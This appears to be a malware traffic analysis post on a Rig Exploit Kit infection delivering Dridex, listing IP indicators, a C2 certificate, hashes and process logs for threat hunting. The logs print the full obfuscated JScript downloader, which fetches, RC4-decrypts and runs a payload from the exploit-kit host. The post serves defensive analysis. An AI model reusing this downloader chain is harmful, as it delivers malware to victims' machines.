Rig Exploit Kit delivers Dridex

A zipped pcap of the infection traffic is attached for analysis. The zip password is "infected" (all lowercase). The capture contains live exploit-kit and malware traffic, including the downloaded payload, so extract and open it only in an isolated analysis environment.

PCAP file of the infection traffic:
2020-01-30-Rig-EK-Dridex.zip

 

ASSOCIATED INDICATORS (IP ADDRESSES / DOMAINS):

185.220.35.26 – gettime.xyz GET /selfali?cpm_id=114467297 – REDIRECT TO RIG EK
185.200.241.26 – RIG EXPLOIT KIT
88.217.172.65 – Port 443 (TLS) – DRIDEX C2

IMAGES AND DETAILS:

Shown above (screenshot not reproduced in this text extract): Network traffic associated with Rig Exploit Kit and Dridex C2

Shown above (screenshot not reproduced in this text extract): TLS certificate presented by the Dridex command and control (C2) server

Dridex Certificate (subject fields as observed in the traffic):
Certificate (id-at-commonName=Stherchagri.jetzt,id-at-organizationName=Omsut GMK,id-at-localityName=Kathmandu,id-at-countryName=NP)
Note: the subject is nonsensical (random-looking CN, organization and locality that do not match). Certificate subject fields like these are usually a more durable hunting pivot in TLS inspection logs than the C2 IP address, which can change between campaigns.

 

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

Summary of the chain recorded below: iexplore.exe spawns cmd.exe, which echoes an obfuscated JScript downloader into %temp%\o.txt and launches it with "wscript //B //E:JScript". The script fetches the payload from 185.200.241.26 over plain HTTP using WinHttp.WinHttpRequest.5.1 (request option 0, the User-Agent string, is set to the third script argument "¤"), decrypts the response with an RC4-style routine (256-byte key schedule, swap-and-XOR keystream) keyed by the first argument "vcbdf45", writes it to a GetTempName() file via ADODB.Stream, appends .dll or .exe depending on a byte of the PE file header (the high byte of Characteristics, where the DLL flag lives), runs it through "Regsvr32.exe /s" (DLL) or "cmd.exe /c" (EXE), and finally deletes o.txt. Hunting pivots: cmd.exe spawned by a browser with an "echo ... >o.txt" command line, wscript.exe with //E:JScript, a *.tmp.exe in %temp% started by cmd.exe whose parent is wscript.exe, and that final process making an outbound TCP/443 connection.

Image C:\Windows\System32\cmd.exe
CommandLine cMd.exe /q /c cd /d “%%temp%%” && echo function Qsdfsd(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGe”,u=function(x){return E.split(“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+=”tTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “;var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,L=WScript[u(14)],v=u(9),m=WScript[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00″)+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DaSDADAD123ASD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Qsdfsd(d.responseText,g(n))};>o.txt && stArT wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx” “¤”
CurrentDirectory C:\Users\John\Desktop\
User John-PC\John
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe”

Image C:\Windows\System32\wscript.exe
CommandLine wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx” “¤”
CurrentDirectory C:\Users\John\AppData\Local\Temp\
User John-PC\John
Hashes MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine cMd.exe /q /c cd /d “%temp%” && echo function Qsdfsd(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGe”,u=function(x){return E.split(“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{E+=”tTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “;var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,L=WScript[u(14)],v=u(9),m=WScript[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00″)+027);s.writetext(i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DaSDADAD123ASD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Qsdfsd(d.responseText,g(n))};>o.txt && stArT wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx”

Image C:\Windows\System32\wscript.exe
User John-PC\John
Protocol tcp
SourceIp 192.168.4.134
DestinationIp 185.200.241.26
DestinationHostname
DestinationPort 80
DestinationPortName http

Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\System32\cmd.exe” /c radBD8F2.tmp.exe
CurrentDirectory C:\Users\John\AppData\Local\Temp\
User John-PC\John
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Windows\System32\wscript.exe
ParentCommandLine wsCripT //B //E:JScript o.txt “vcbdf45” “http://185.200.241.26/?OTM4NzI=&ifrOA&kpMZhZuK=filly&mgfTeqK=neighboring&KoFKqWOV=accelerator&FeJa=callous&PSnuCDrry=everyone&ffdgdfs=wHbQMvXcJwDIFYbGMvrESKNbNknQA0-PxpH2_drWdZqxKGni2eb5UUSk6FSCEh3h8vo&kRfVUUxuc=abettor&wOOIv=irreverent&oORUx=consignment&bbGuxuig=community&VsdN=callous&XTu=callous&BTSSEcek=callous&t4gff4=kLbFQbwLli0XTelQylYhfVg4b9KCpiRXQyRfPhsGF9ByFYwJ1_JeSFLIz0F_FkvEXd_s&jJVZSQrVMzkxMzMx”

Image C:\Users\John\AppData\Local\Temp\radBD8F2.tmp.exe
FileVersion 2.0.6.0
Description ?
Product ?
Company TechSmith Corporation (version-info string embedded in the dropped binary; presumably spoofed — do not treat vendor metadata as a trust signal)
CommandLine radBD8F2.tmp.exe
CurrentDirectory C:\Users\John\AppData\Local\Temp\
User John-PC\John
MALWARE (dropped Dridex payload) Hashes MD5=B9C33BC3F479CD9E20A95C0D1A177A98,SHA256=3EF308DF2DAB51E8FAC7160705505F3EB0F6A32313456E1380A3B8696E741714
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c radBD8F2.tmp.exe

Image C:\Users\John\AppData\Local\Temp\radBD8F2.tmp.exe
User John-PC\John
Protocol tcp
SourceIp 192.168.4.134
DestinationIp 88.217.172.65
DestinationHostname
DestinationPort 443
DestinationPortName https